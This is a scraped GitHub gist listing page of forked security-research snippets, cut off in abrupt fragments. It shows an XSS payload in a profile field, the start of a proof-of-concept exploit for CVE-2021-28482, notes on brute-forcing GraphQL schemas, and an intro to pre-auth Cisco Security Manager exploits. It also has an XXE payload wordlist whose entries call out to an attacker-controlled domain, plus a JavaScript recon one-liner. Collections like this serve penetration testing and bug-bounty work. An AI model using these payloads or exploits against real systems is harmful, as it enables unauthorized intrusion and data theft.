
:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=

pnig0s pnigos

@pnigos
pnigos / BlindGraphQL.md
Created June 29, 2021 12:39 — forked from me0wday/BlindGraphQL.md
Blind Graphql Discovery to Altair Schema

Playing with GraphQL when introspection is disabled

Quick write-up on extracting a GraphQL schema when introspection is disabled. Bits and pieces were gathered from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions, and some peeps have written tools to automate the extraction process (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

The first step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxying.

@pnigos
pnigos / PoC_CVE-2021-28482.py
Created May 2, 2021 11:34 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
try:
    import re
    import base64
    from hashlib import sha256
    from binascii import hexlify, unhexlify
    from Crypto.Cipher import AES
    from xml.dom import minidom
    from pprint import pprint
@pnigos
pnigos / logger.js
Created March 4, 2021 14:27 — forked from fransr/logger.js
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
// Wrap Element.prototype.getElementById so every call is logged (with its
// argument, the receiving element and that element's markup) and then
// forwarded to the original implementation.
;(getElementByIdCopy => {
    Element.prototype.getElementById = function(q) {
        logger('getElementById', q, this, this.innerHTML);
        return Reflect.apply(getElementByIdCopy, this, [q])
    }
})(Element.prototype.getElementById)
@pnigos
pnigos / CSM_pocs.md
Created November 17, 2020 14:05 — forked from Frycos/CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently, from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. The release notes didn't state anything about the vulnerabilities, and no security advisories were published. All payloads are processed in the context of NT AUTHORITY\SYSTEM.

@pnigos
pnigos / gist:2fbf84f32b5b5738ab557b4af32999c3
Created October 9, 2020 08:59 — forked from dmethvin/gist:1676346
Breakpoint on access to a property
// Replace obj[prop] with an accessor pair that breaks into the debugger on
// every write to the property (and on every read as well when debugGet is set),
// while preserving the property's current value.
function debugAccess(obj, prop, debugGet){
    var origValue = obj[prop];
    Object.defineProperty(obj, prop, {
        get: function () {
            if ( debugGet )
                debugger;
            return origValue;
        },
        set: function (val) {
            debugger;
            return origValue = val;
        }
    });
}
@pnigos
pnigos / xxe-payloads.txt
Created September 14, 2020 14:07 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
curl -s "$1" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep '\.js' > jslinks.txt; while IFS= read -r link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep "$2" | grep -v "$3" | sort -n | uniq; rm -f jslinks.txt